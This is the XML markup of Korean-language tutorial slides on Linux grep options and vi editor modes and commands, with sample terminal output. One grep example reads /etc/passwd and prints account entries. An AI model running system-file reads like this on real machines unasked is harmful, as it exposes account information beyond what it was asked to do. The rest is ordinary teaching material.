              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>3</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 | grep -v </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>grepme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>12</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 15:11 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 26 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27 20:08 ..</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15:10 grepnotme1</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15:10 grepnotme2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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 | grep -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GREPme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRP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15:10 grepme1</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15:10 grepme2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</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15:11 grepme3</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ls -al | grep -n </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>grepme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>4:-</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15:10 grepme1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>5:-</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15:10 grepme2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>6:-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r--  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>    0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 15:11 grepme3</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grep "root" /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>root:x:0:0:root:/root:/bin/bash</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>operator:x:11:0:operator:/root:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>nologin</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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echo "word1 word2 word3"&gt;grepword1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echo "word1 word4" &gt; grepword2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cat * | grep word</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>word1 word2 word3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>word1 word4</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cat * | grep -w word</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cat * | grep -w word3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>word1 word2 word3</a:t>
              </a:r>
            </a:p>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/Theory/T2/22</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># vi : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 기본 편집기</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> test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cd test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touch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>vitest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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test]# vi </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>vitest</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>] &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>명령</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>&gt; -&gt; &lt;ex </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:q  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>편집기 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:q!  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>변경된 내용이 있더라도</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>저장하지 않고 무조건 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>wq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>변경된 내용을 저장하고 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, a, o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>] &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>명령</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>&gt; -&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>편집</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>문자열 입력</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>수정 가능</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> esc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>]  &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>편집</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>&gt; -&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>명령</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>모드 변경</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1"/>
                <a:t>복사</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1"/>
                <a:t>이동</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>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a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
                <a:t> 명령 모드 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>치환</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1"/>
                <a:t>저장 및 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>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a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
                <a:t>ex </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
                <a:t>모드 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>문서작성</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1"/>
                <a:t>편집</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1"/>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a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200"/>
                <a:t> 편집 모드 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a, o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ESC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4222544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/Theory/T2/22</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># vi : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 기본 편집기</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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2186"/>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u</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직전에 내린 명령을 취소</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/exp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‘exp’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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‘exp’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>와 같은 문자열을 뒤에서부터 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>윗</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
